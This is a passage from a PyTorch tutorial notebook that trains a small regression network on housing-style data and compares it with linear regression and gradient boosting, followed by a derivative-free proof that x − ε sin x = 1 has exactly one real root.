        x = F.relu(self.hidden(x))  # activation function for the hidden layer
        x = self.predict(x)  # linear output
        return x


net = Net(cols, size_hidden, n_output)
```

```
Executing the model on : cuda:0
```
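The network is small: 22 inputs, one hidden layer of 100 ReLU units, one output. The sketch below counts its parameters and, since the notebook prints `cuda:0` but never calls `.to(device)`, shows one way to actually place the model and a batch on that device. The 22/100/1 sizes are taken from the notebook; the zero input batch is made up.

```python
import torch
import torch.nn as nn
import torch.nn.functional as F


class Net(nn.Module):
    """Same architecture as above: n_feature -> size_hidden (ReLU) -> n_output."""

    def __init__(self, n_feature, size_hidden, n_output):
        super().__init__()
        self.hidden = nn.Linear(n_feature, size_hidden)
        self.predict = nn.Linear(size_hidden, n_output)

    def forward(self, x):
        return self.predict(F.relu(self.hidden(x)))


device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
net = Net(22, 100, 1).to(device)  # move the parameters to the chosen device

# Weights + biases: 22*100 + 100 + 100*1 + 1 = 2401
n_params = sum(p.numel() for p in net.parameters())
print(n_params)  # 2401

batch = torch.zeros(5, 22, device=device)  # inputs must live on the same device
with torch.no_grad():
    out = net(batch)
print(out.shape)  # torch.Size([5, 1])

pred = out[:, 0].cpu().numpy()  # copy back to the CPU before calling .numpy()
```

The `.cpu()` call matters once the model really runs on a GPU: `.numpy()` only works on CPU tensors.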
```python
# Adam is a specific flavor of gradient descent which typically works better
optimizer = torch.optim.Adam(net.parameters(), lr=learning_rate)
# optimizer = torch.optim.SGD(net.parameters(), lr=0.2)
criterion = torch.nn.MSELoss(reduction='sum')  # regression loss: sum (not mean) of squared errors over the batch
```
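With `reduction='sum'` the loss is the sum of squared errors, not their mean, which is why the logged loss values below are in the thousands. This toy sketch (made-up numbers) compares the two reductions and also shows why the training loop calls `torch.unsqueeze(labels, dim=1)`: without it, shapes `(B, 1)` and `(B,)` broadcast to `(B, B)`.

```python
import torch

outputs = torch.tensor([[1.0], [2.0], [3.0]])  # model output, shape (3, 1)
labels = torch.tensor([1.5, 2.0, 2.0])         # targets, shape (3,)

target = labels.unsqueeze(1)  # (3,) -> (3, 1), as in the training loop
sum_loss = torch.nn.MSELoss(reduction="sum")(outputs, target)
mean_loss = torch.nn.MSELoss(reduction="mean")(outputs, target)

# Squared errors are 0.25, 0.0 and 1.0
print(sum_loss.item())   # 1.25
print(mean_loss.item())  # about 0.4167, i.e. 1.25 / 3

# Without unsqueeze the difference silently broadcasts to a 3 x 3 matrix
print((outputs - labels).shape)  # torch.Size([3, 3])
```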
```python
from torch.utils.data import TensorDataset, DataLoader

# Mini-batches of the training data (shuffle defaults to False, so the batch order is the same every epoch)
train_loader = DataLoader(
    TensorDataset(torch.tensor(X_train, dtype=torch.float32),
                  torch.tensor(y_train, dtype=torch.float32)),
    batch_size=batch_size)

X_test_tensor = torch.tensor(X_test, dtype=torch.float32)
y_test_tensor = torch.tensor(y_test, dtype=torch.float32)

test_loader = DataLoader(
    TensorDataset(X_test_tensor, y_test_tensor),
    batch_size=test_batch_size)
```
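`batch_no = len(X_train) // batch_size` counts only full batches, while the DataLoader also yields the final partial batch unless `drop_last=True`. This sketch uses zero tensors with the notebook's shapes (354 rows, 22 features) to show the difference.

```python
import torch
from torch.utils.data import TensorDataset, DataLoader

n_train, n_features, batch_size = 354, 22, 50
dataset = TensorDataset(torch.zeros(n_train, n_features), torch.zeros(n_train))
loader = DataLoader(dataset, batch_size=batch_size)  # drop_last=False by default

batch_no = n_train // batch_size  # full batches only, as computed in the notebook
print(batch_no, len(loader))      # 7 8

last_inputs, last_labels = list(loader)[-1]
print(last_inputs.shape)  # torch.Size([4, 22]), since 354 - 7 * 50 = 4
```

Because the loss uses `reduction='sum'`, that last 4-row batch contributes a smaller loss than the full 50-row batches.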
```python
train_loss = []
train_r2 = []
test_loss = []
test_r2_x = []
test_r2 = []
```
```python
from sklearn.metrics import r2_score

running_loss = 0.0
for epoch in range(num_epochs):
    # Mini-batch learning (train_loader is not shuffled between epochs)
    net.train()
    for inputs, labels in train_loader:
        # zero the parameter gradients
        optimizer.zero_grad()

        # forward + backward + optimize
        outputs = net(inputs)  # shape (batch, 1)
        # unsqueeze labels from (batch,) to (batch, 1) so they match outputs
        loss = criterion(outputs, torch.unsqueeze(labels, dim=1))
        loss.backward()
        optimizer.step()

        # running_loss: summed squared error over the current epoch
        running_loss += loss.item()

    # Every 20 epochs (and at the last one), evaluate on the test set and log
    if epoch % 20 == 0 or epoch == num_epochs - 1:
        with torch.no_grad():
            net.eval()
            result = net(X_test_tensor)
            pred = result.data[:, 0].numpy()
            # Note: sklearn's signature is r2_score(y_true, y_pred); the arguments
            # are swapped here, and R^2 is not symmetric in them.
            r2_test = r2_score(pred, y_test)
            test_r2_x.append(epoch)
            test_r2.append(r2_test)
            print('Epoch {:5}, loss {:10}, r2: {:3}'.format(epoch + 1, running_loss, r2_test))
    train_loss.append(running_loss)
    running_loss = 0.0
```

```
Epoch     1, loss 183307.15435791016, r2: -2.598610349628883
Epoch    21, loss 12408.028907775879, r2: 0.012998142345433839
Epoch    41, loss 9915.79284286499, r2: 0.3333615213725519
Epoch    61, loss 8882.879081726074, r2: 0.348562519228811
Epoch    81, loss 6280.446783065796, r2: 0.49985757136694375
Epoch   101, loss 5083.443628311157, r2: 0.47137647771965885
Epoch   121, loss 4280.029432296753, r2: 0.5414219095454249
Epoch   141, loss 3558.088544845581, r2: 0.6027891438869899
Epoch   161, loss 3337.6654014587402, r2: 0.6037971240580867
Epoch   181, loss 3318.3874855041504, r2: 0.5410183626548175
Epoch   201, loss 2860.4403324127197, r2: 0.5880700361113333
Epoch   221, loss 4202.569885253906, r2: 0.24101134042952954
Epoch   241, loss 2625.922472000122, r2: 0.6117615302232601
Epoch   261, loss 3141.6027069091797, r2: 0.518363446529775
Epoch   281, loss 3209.169864654541, r2: 0.699972316605045
Epoch   301, loss 2891.8109397888184, r2: 0.4471336384834912
Epoch   321, loss 2454.4431190490723, r2: 0.680289615010776
Epoch   341, loss 2721.572551727295, r2: 0.6537569197620496
Epoch   361, loss 2374.3646926879883, r2: 0.6716516044749056
Epoch   381, loss 3353.4731216430664, r2: 0.650187875665645
Epoch   401, loss 3029.42342376709, r2: 0.6688595181218332
Epoch   421, loss 6365.018569946289, r2: 0.5285317058425256
Epoch   441, loss 3570.9040994644165, r2: 0.6478276332416046
Epoch   461, loss 5335.774890899658, r2: 0.575522473404229
Epoch   481, loss 4620.325346946716, r2: 0.6434875354238424
Epoch   500, loss 3078.047025680542, r2: 0.6554469434865164
```
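R² is defined as 1 − SS_res / SS_tot, where SS_tot is computed around the mean of the *true* values, so swapping the arguments of `r2_score(y_true, y_pred)` changes the result. The notebook calls `r2_score(pred, ...)`, i.e. with the prediction first. This sketch uses made-up numbers to compare sklearn with a hand-written formula in both orders; `r2_manual` is a hypothetical helper.

```python
import numpy as np
from sklearn.metrics import r2_score

y_true = np.array([3.0, 5.0, 7.0, 9.0])
y_pred = np.array([2.5, 5.5, 6.0, 9.5])


def r2_manual(y_true, y_pred):
    """Coefficient of determination: 1 - SS_res / SS_tot."""
    ss_res = np.sum((y_true - y_pred) ** 2)
    ss_tot = np.sum((y_true - y_true.mean()) ** 2)  # spread of the TRUE values
    return 1 - ss_res / ss_tot


print(r2_score(y_true, y_pred), r2_manual(y_true, y_pred))  # both about 0.9125
print(r2_score(y_pred, y_true), r2_manual(y_pred, y_true))  # both about 0.929
```

Here SS_res = 1.75 in both orders, but SS_tot is 20 around the true values and about 24.69 around the predictions, so the two orders disagree.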
```python
from sklearn.metrics import r2_score

# R^2 on the training set (same argument order as in the training loop)
with torch.no_grad():
    result = net(torch.FloatTensor(X_train))
pred = result[:, 0].numpy()
print(len(pred), len(y_train))
r2_score(pred, y_train)
```

```
354 354
0.9136254737114893
```
```python
plt.figure()
train_loss_np = np.array(train_loss)
# Red: per-epoch training loss normalized by its maximum; green: test R^2 clipped at 0
plt.plot(range(len(train_loss)), train_loss_np / train_loss_np.max(), "r", label="train")
plt.plot(test_r2_x, np.maximum(np.array(test_r2), 0), "g", label="test")
plt.legend()
```



Analysis of the training results

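  • After 500 epochs,
  • the test-set R² is 0.72 and the training-set R² is 0.90;
  • the residual is still decreasing, but the test-set R² has barely improved after about 150 epochs.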
```python
# save model
torch.save(net.state_dict(), "dnn.pt")
```
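A saved `state_dict` holds only the weights, so loading it requires an instance of the same architecture with the same attribute names. This is a round-trip sketch: it writes to a temporary directory instead of `dnn.pt` and re-declares the network so it runs on its own.

```python
import os
import tempfile

import torch
import torch.nn as nn
import torch.nn.functional as F


class Net(nn.Module):
    # Must match the saved model: same layers, same attribute names
    def __init__(self, n_feature, size_hidden, n_output):
        super().__init__()
        self.hidden = nn.Linear(n_feature, size_hidden)
        self.predict = nn.Linear(size_hidden, n_output)

    def forward(self, x):
        return self.predict(F.relu(self.hidden(x)))


torch.manual_seed(0)
net = Net(22, 100, 1)

with tempfile.TemporaryDirectory() as tmp:
    path = os.path.join(tmp, "dnn.pt")
    torch.save(net.state_dict(), path)

    restored = Net(22, 100, 1)  # fresh, randomly initialized copy
    restored.load_state_dict(torch.load(path))
    restored.eval()  # inference mode before predicting

x = torch.randn(3, 22)
with torch.no_grad():
    same = torch.equal(net(x), restored(x))
print(same)  # True
```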

Model comparison

  • First import the linear regression model class: from sklearn.linear_model import LinearRegression
  • Create the model.
  • Fit it on the training set.
  • Obtain the trained model.
```python
from sklearn.linear_model import LinearRegression
lm = LinearRegression()
lm.fit(X_train, y_train)
```

```
LinearRegression()
```
```python
print('R2 for Train', lm.score(X_train, y_train))
print('R2 for Test (cross validation)', lm.score(X_test, y_test))
```

```
R2 for Train 0.7732977014498186
R2 for Test (cross validation) 0.6789738823760003
```
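`LinearRegression` fits ordinary least squares, and its `score` method returns R². As a sanity check, this sketch fits it on synthetic data (not the Boston features) and compares the coefficients with a direct least-squares solve via `np.linalg.lstsq`, adding a column of ones for the intercept.

```python
import numpy as np
from sklearn.linear_model import LinearRegression

rng = np.random.default_rng(0)
X = rng.normal(size=(50, 3))                          # synthetic features
true_coef = np.array([1.5, -2.0, 0.5])
y = X @ true_coef + 3.0 + 0.1 * rng.normal(size=50)  # synthetic target, intercept 3

lm = LinearRegression().fit(X, y)

# Ordinary least squares by hand: append a column of ones for the intercept
A = np.column_stack([X, np.ones(len(X))])
coef, *_ = np.linalg.lstsq(A, y, rcond=None)

print(np.allclose(lm.coef_, coef[:3]), np.isclose(lm.intercept_, coef[3]))  # True True
print(lm.score(X, y))  # R^2 on the data the model was fit on
```

Because the model has a closed-form solution, refitting it gives the same coefficients every time, which is one reason the linear baseline is cheap and stable.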
```python
# GBDT model
from sklearn.ensemble import GradientBoostingRegressor

reg = GradientBoostingRegressor(random_state=0)
reg.fit(X_train, y_train)

print('R2 for Train', reg.score(X_train, y_train))
print('R2 for Test (cross validation)', reg.score(X_test, y_test))
```

```
R2 for Train 0.9841732181245905
R2 for Test (cross validation) 0.8405851379007085
```

Conclusions of the comparison

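  • The linear regression model is slightly worse than the two-layer neural network, but it is more stable and trustworthy, and faster to compute.
  • On this problem, the GBDT model outperforms the neural network across the board.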

Problem:

Prove that the equation $x-\epsilon \sin{x} = 1 \ (0 \lt \epsilon \lt 1)$ has exactly one real root on $\mathbb{R}$.
(Restriction: derivatives may not be used.)

Analysis:

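The moment I saw the problem, my reaction was "isn't this as easy as 1 + 1?", it looked obvious.

Then I noticed that derivatives were not allowed, and I was stuck.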

First, let
$$f(x) = x-\epsilon \sin{x} - 1$$

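Then $f(0) = -1 \lt 0$ and $f(2) = 1 - \epsilon \sin{2} \gt 0$ (because $0 \lt \epsilon \sin{2} \lt 1$). Since elementary functions are continuous, the intermediate value theorem (zero theorem) implies that $f(x) = 0$ has at least one root in $(0, 2)$.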

Next, prove monotonicity:

Let $x_1 > x_2$.

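$$
\begin{aligned}
f(x_1) - f(x_2) &= (x_1-\epsilon \sin{x_1} - 1) - (x_2-\epsilon \sin{x_2} - 1) \\
&= (x_1 - x_2) - \epsilon(\sin{x_1} - \sin{x_2}) \\
&= (x_1 - x_2) - 2\epsilon\cos{\frac{x_1+x_2}{2}}\sin{\frac{x_1 - x_2}{2}} \\
&\geq (x_1 - x_2) - 2\epsilon\left|\sin{\frac{x_1 - x_2}{2}}\right| \\
&= 2\left(\frac{x_1 - x_2}{2} - \epsilon \left|\sin{\frac{x_1 - x_2}{2}}\right|\right) \\
&= 2(u - \epsilon |\sin{u}|)
\end{aligned}
$$

where $u = \frac{x_1 - x_2}{2}$, and the inequality uses $\left|\cos{\frac{x_1+x_2}{2}}\right| \leq 1$.

Since $x_1 > x_2$, we have $u > 0$. For every $u > 0$ it holds that $|\sin{u}| \lt u$, and this needs no derivatives: for $0 \lt u \lt \frac{\pi}{2}$, the triangle with vertices $(0, 0)$, $(1, 0)$, $(\cos{u}, \sin{u})$ has area $\frac{\sin{u}}{2}$, which is smaller than the area $\frac{u}{2}$ of the circular sector containing it; for $u \geq \frac{\pi}{2}$, $|\sin{u}| \leq 1 \lt u$.

Together with $0 \lt \epsilon \lt 1$ this gives

$$u - \epsilon |\sin{u}| \gt u - \epsilon u = (1 - \epsilon) u \gt 0,$$

so the expression is $> 0$, i.e. $f(x_1) > f(x_2)$.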
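As a numerical sanity check (not a substitute for the proof), the root can be located with bisection, which itself needs no derivatives and relies only on the sign change $f(0) < 0 < f(2)$ shown above. The sketch also checks on an evenly spaced grid that $f$ increases. The ε values, grid range, and tolerance are arbitrary choices for illustration.

```python
import math


def f(x, eps):
    """f(x) = x - eps * sin(x) - 1 from the problem statement."""
    return x - eps * math.sin(x) - 1


def bisect_root(eps, lo=0.0, hi=2.0, tol=1e-12):
    """Derivative-free bisection on [lo, hi], assuming f(lo) < 0 < f(hi)."""
    assert f(lo, eps) < 0 < f(hi, eps)
    while hi - lo > tol:
        mid = (lo + hi) / 2
        if f(mid, eps) < 0:
            lo = mid
        else:
            hi = mid
    return (lo + hi) / 2


def is_increasing_on_grid(eps, start=-20.0, stop=20.0, steps=4000):
    """Check f(x_{i+1}) > f(x_i) on an evenly spaced grid (evidence, not proof)."""
    xs = [start + (stop - start) * i / steps for i in range(steps + 1)]
    values = [f(x, eps) for x in xs]
    return all(b > a for a, b in zip(values, values[1:]))


for eps in (0.1, 0.5, 0.9):
    root = bisect_root(eps)
    print(eps, root, f(root, eps), is_increasing_on_grid(eps))
```

By the bound $f(x_1) - f(x_2) \geq 2(1 - \epsilon)u$, neighboring grid points with step $h$ differ by at least $(1 - \epsilon)h$, so the grid check passes comfortably even for ε = 0.9.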